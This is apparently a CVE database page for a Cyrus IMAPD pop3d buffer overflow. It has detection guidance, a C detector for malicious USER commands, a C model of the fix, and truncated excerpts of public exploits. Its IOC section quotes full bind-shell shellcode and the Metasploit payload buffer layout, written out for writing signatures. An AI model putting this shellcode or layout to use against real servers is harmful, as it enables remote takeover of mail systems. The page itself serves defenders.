CVE-2006-2502
Published 2006-05-22
Priority: P3 · 48 · medium · CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
EXPLOIT: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 53.33% (98.9th percentile)
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyrus | imapd | — | — |
Detection & IOCs (extracted from sources)
bytes (bind-shell shellcode quoted in the exploit sources):
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
- Detect exploitation attempts by monitoring POP3 (TCP/110) for oversized USER commands — the exploit sends a USER argument containing shellcode followed by repeated return address packing, resulting in a payload well exceeding normal username length.
- Alert on inbound TCP connections to port 13370 from a host that recently sent a malformed POP3 USER command — the bind-shell shellcode opens a listener on port 13370.
- Scan network traffic on TCP/110 for the bind-shell shellcode byte sequence starting with \x31\xdb\x53\x43\x53\x6a\x02 within a USER command.
- The exploit overwrites the GOT to place shellcode and defeat stack-protection/ASLR; monitor for unexpected executable memory writes in pop3d process space (e.g., via ptrace or kernel auditing).
- The vulnerability is only triggerable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD config; audit imapd.conf for this setting as a risk indicator.
- The Metasploit exploit buffer layout is: 'USER ' + 265 NOPs + ret*2 + (250-shellcode_len) NOPs + shellcode + 29 NOPs + sc_addr*4 + CRLF — use this structure to build a Snort/Suricata content match on TCP/110.
- The vulnerability is only exploitable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD configuration; systems without this option are not affected.
- Fedora Core 5 ships with the vulnerable code version but is not exploitable due to the FORTIFY_SOURCE compiler enhancement.
- Red Hat Enterprise Linux versions of cyrus-imapd are not affected by this issue.
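The indicators in the list above can be folded into one check per POP3 client line. The block below is an added example written for this page; it is not code from any IDS, from a Snort/Suricata rule, or from the exploit sources. The function names `classify_pop3_line`, `classify_pop3_cstr` and `classify_repeated`, the 128-byte "normal username" threshold, the 32-byte NOP-run threshold, and the assumption that the sled consists of plain x86 0x90 bytes are all this example's own choices; the shellcode prefix is the one quoted in the bullets. All sample lines are constructed, not captured traffic.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <ctype.h>

/* Leading bytes of the bind-shell shellcode quoted on this page. */
static const unsigned char kShellcodePrefix[] = {0x31, 0xdb, 0x53, 0x43, 0x53, 0x6a, 0x02};

/* Assumed thresholds: real mailbox names are short, the exploit buffer is
 * several hundred bytes, and the Metasploit layout starts with 265 NOPs. */
#define USER_ARG_MAX_NORMAL 128
#define NOP_RUN_ALERT       32

enum pop3_verdict {
    POP3_NOT_USER = 0,      /* not a USER command, nothing to do */
    POP3_USER_OK,           /* plausible username */
    POP3_USER_OVERSIZED,    /* argument longer than any sane username */
    POP3_USER_NOP_SLED,     /* long run of 0x90 (x86 NOP) bytes in the argument */
    POP3_USER_SHELLCODE     /* known shellcode prefix present */
};

/* Byte-string search that tolerates NUL bytes (the payload is binary). */
static int contains_bytes(const unsigned char *hay, size_t hlen,
                          const unsigned char *needle, size_t nlen)
{
    if (nlen == 0 || hlen < nlen) return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return 1;
    return 0;
}

/* Longest run of consecutive 0x90 bytes (assumes a plain x86 NOP sled). */
static size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == 0x90) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Classifies one client line (explicit length so embedded NULs are kept). */
enum pop3_verdict classify_pop3_line(const unsigned char *line, size_t len)
{
    /* POP3 verbs are case-insensitive; only "USER <arg>" is of interest. */
    if (len < 5) return POP3_NOT_USER;
    for (int i = 0; i < 4; i++)
        if (toupper(line[i]) != "USER"[i]) return POP3_NOT_USER;
    if (line[4] != ' ') return POP3_NOT_USER;

    const unsigned char *arg = line + 5;
    size_t alen = len - 5;
    while (alen > 0 && (arg[alen - 1] == '\r' || arg[alen - 1] == '\n')) alen--;

    /* Most specific indicator first, size heuristic last. */
    if (contains_bytes(arg, alen, kShellcodePrefix, sizeof kShellcodePrefix))
        return POP3_USER_SHELLCODE;
    if (longest_nop_run(arg, alen) >= NOP_RUN_ALERT)
        return POP3_USER_NOP_SLED;
    if (alen > USER_ARG_MAX_NORMAL)
        return POP3_USER_OVERSIZED;
    return POP3_USER_OK;
}

/* Convenience wrapper for NUL-free sample lines. */
enum pop3_verdict classify_pop3_cstr(const char *s)
{
    return classify_pop3_line((const unsigned char *)s, strlen(s));
}

/* Builds "USER " + count copies of byte + CRLF and classifies it; handy for
 * trying the thresholds against synthetic arguments (count capped at 1024). */
enum pop3_verdict classify_repeated(unsigned char byte, size_t count)
{
    static unsigned char buf[5 + 1024 + 2];
    if (count > 1024) count = 1024;
    memcpy(buf, "USER ", 5);
    memset(buf + 5, byte, count);
    buf[5 + count] = '\r';
    buf[6 + count] = '\n';
    return classify_pop3_line(buf, 7 + count);
}

int main(void)
{
    /* Constructed samples, not real traffic. */
    printf("normal login : %d\n", classify_pop3_cstr("USER alice\r\n"));
    printf("non-USER verb: %d\n", classify_pop3_cstr("QUIT\r\n"));
    printf("300 x 'A'    : %d\n", classify_repeated('A', 300));
    printf("300 x 0x90   : %d\n", classify_repeated(0x90, 300));
    printf("shellcode    : %d\n", classify_pop3_cstr("USER " "\x31\xdb\x53\x43\x53\x6a\x02" "\r\n"));
    return 0;
}
```

The shellcode prefix is checked before the length and NOP heuristics because it is the most specific indicator; the other two exist to catch variants that swap in a different payload. In a real deployment the thresholds belong in configuration, and the length check should be tuned against the site's longest legitimate mailbox names so that long but valid logins do not alert.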
CVSS provenance
nvd · v2.0 · 5.1 MEDIUM · AV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat · 5.1 MEDIUM
GHSA
GHSA-vqvc-vrx3-5hgj (ghsa_unreviewed · 2022-05-01)
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Red Hat
CVE-2006-2502 (vendor_redhat · CVSS 5.1 MEDIUM)
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Statement: Not vulnerable. This issue does not affect the versions of cyrus-imapd distributed with Red Hat Enterprise Linux.
No detection rules found.
Exploit-DB
Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)
exploitdb · 2010-04-30
---
##
# $Id: cyrus_pop3d_popsubfolders.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
'Description' => %q{
This exploit takes advantage of a stack based overflow. Once the stack
corruption has occurred it is possible to overwrite a pointer which is
later used for a memcpy. This gives us a write anything anywhere condition
similar to a format string vulnerability.
NOTE: The popsubfo
Exploit-DB
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)
exploitdb · 2006-08-14
---
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
## exploits and not either of them worked (not that they don't but coding my own is generally faster
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe I just got really
## unlucky and missed the offset in between the 5 runs I gave it. The one from bannedit was interesting...
## really nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
## when I was writing this exploit with the same method, and I placed my shellcode in GOT, fun
Exploit-DB
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)
exploitdb · 2006-05-21
---
/* zeroday warez
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
* cyruspop3d.c - cyrus pop3d remote exploit by kcope
* tested on cyrus-imapd-2.3.2,linux
*
* bug found 23 Apr 2006 by kcope
*
* imapd/pop3d.c line 1830 :
* char userbuf[MAX_MAILBOX_NAME+1], *p;
* ...
* if (!ulen) ulen = strlen(user);
* if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
* memcpy(userbuf, user, ulen);
* userbuf[ulen] = '\0';
* ...
* popsubfolders has to be enabled
*
* thnx to blackzero revoguard wY! qobaiashi bogus alex
* Love to Lisa :-)
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define POP3PORT 110
#define BINDPORT 13370
unsigned char shellcode[] =
Metasploit
Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
metasploit
This exploit takes advantage of a stack based overflow. Once the stack corruption has occurred it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement.
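To make concrete the pointer overwrite that the Metasploit description refers to, here is an added example (not Cyrus code and not from any of the page's sources) that models the locals `char userbuf[MAX_MAILBOX_NAME+1], *p;` quoted from pop3d.c in the kcope exploit header as a struct, and contrasts the unchecked `memcpy` with a length-checked copy of the kind a fix needs. The struct layout (the pointer directly after the buffer), the value 490 assumed for `MAX_MAILBOX_NAME`, and the names `copy_user_unchecked`, `copy_user_checked`, `checked_copy_accepts` and `demo_pointer_corruption` are this example's assumptions; the actual Cyrus patch may take a different form.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed for the model; the real constant lives in Cyrus' headers and the
 * demonstration does not depend on its exact value. */
#define MAX_MAILBOX_NAME 490

/* Stand-in for the pop3d locals "char userbuf[MAX_MAILBOX_NAME+1], *p;".
 * Placing p right after userbuf mirrors a common stack layout for adjacent
 * locals; the layout itself is an assumption of this model. */
struct pop3_frame {
    char  userbuf[MAX_MAILBOX_NAME + 1];
    char *p;
};

/* Mirrors the vulnerable pattern: the caller's ulen is trusted. The copy is
 * expressed over the frame's raw bytes (clamped to sizeof *f so the model is
 * itself memory safe); bytes past userbuf land on p exactly as they would on
 * the real stack. */
static void copy_user_unchecked(struct pop3_frame *f, const char *user, size_t ulen)
{
    if (ulen > sizeof *f) ulen = sizeof *f;   /* model safety clamp only */
    memcpy((char *)f, user, ulen);            /* overflows userbuf into p */
}

/* Hardened form: refuse anything that does not fit before copying.
 * Returns 0 on success, -1 if the user name is too long. */
int copy_user_checked(struct pop3_frame *f, const char *user, size_t ulen)
{
    if (ulen > MAX_MAILBOX_NAME) return -1;
    memcpy(f->userbuf, user, ulen);
    f->userbuf[ulen] = '\0';
    return 0;
}

/* Returns 1 if the checked copy accepts `user` and stores it intact with the
 * neighbouring pointer untouched, 0 if it rejects the input. */
int checked_copy_accepts(const char *user)
{
    struct pop3_frame f;
    f.p = NULL;
    if (copy_user_checked(&f, user, strlen(user)) != 0) return 0;
    return strcmp(f.userbuf, user) == 0 && f.p == NULL;
}

/* Feeds one constructed oversized USER argument to both copies.
 * Returns 1 when the unchecked copy clobbers p while the checked copy rejects
 * the input and leaves p intact, 0 otherwise. */
int demo_pointer_corruption(void)
{
    static char target[] = "legit";
    char user[sizeof(struct pop3_frame)];     /* constructed: long enough to reach p */
    memset(user, 'A', sizeof user);

    struct pop3_frame f;
    f.p = target;
    copy_user_unchecked(&f, user, sizeof user);
    int corrupted = memcmp(&f.p, &(char *){target}, sizeof f.p) != 0;

    struct pop3_frame g;
    g.p = target;
    int rejected = copy_user_checked(&g, user, sizeof user) == -1;
    int intact   = g.p == target;

    return corrupted && rejected && intact;
}

int main(void)
{
    printf("checked copy accepts \"alice\": %d\n", checked_copy_accepts("alice"));
    printf("unchecked copy corrupts p, checked copy rejects: %d\n", demo_pointer_corruption());
    return 0;
}
```

The point of the model is the order of operations in the fix: the length is validated against the destination's capacity before any byte is copied, so the pointer that the Metasploit text describes as "later used for a memcpy" is never reachable. A `FORTIFY_SOURCE` build, as the Fedora Core 5 note above describes, catches the same overflow at run time, but a pre-copy check is the fix that does not depend on the toolchain.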
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
http://securitytracker.com/id?1016131
http://www.securityfocus.com/bid/18056
http://www.vupen.com/english/advisories/2006/1891
https://exchange.xforce.ibmcloud.com/vulnerabilities/26578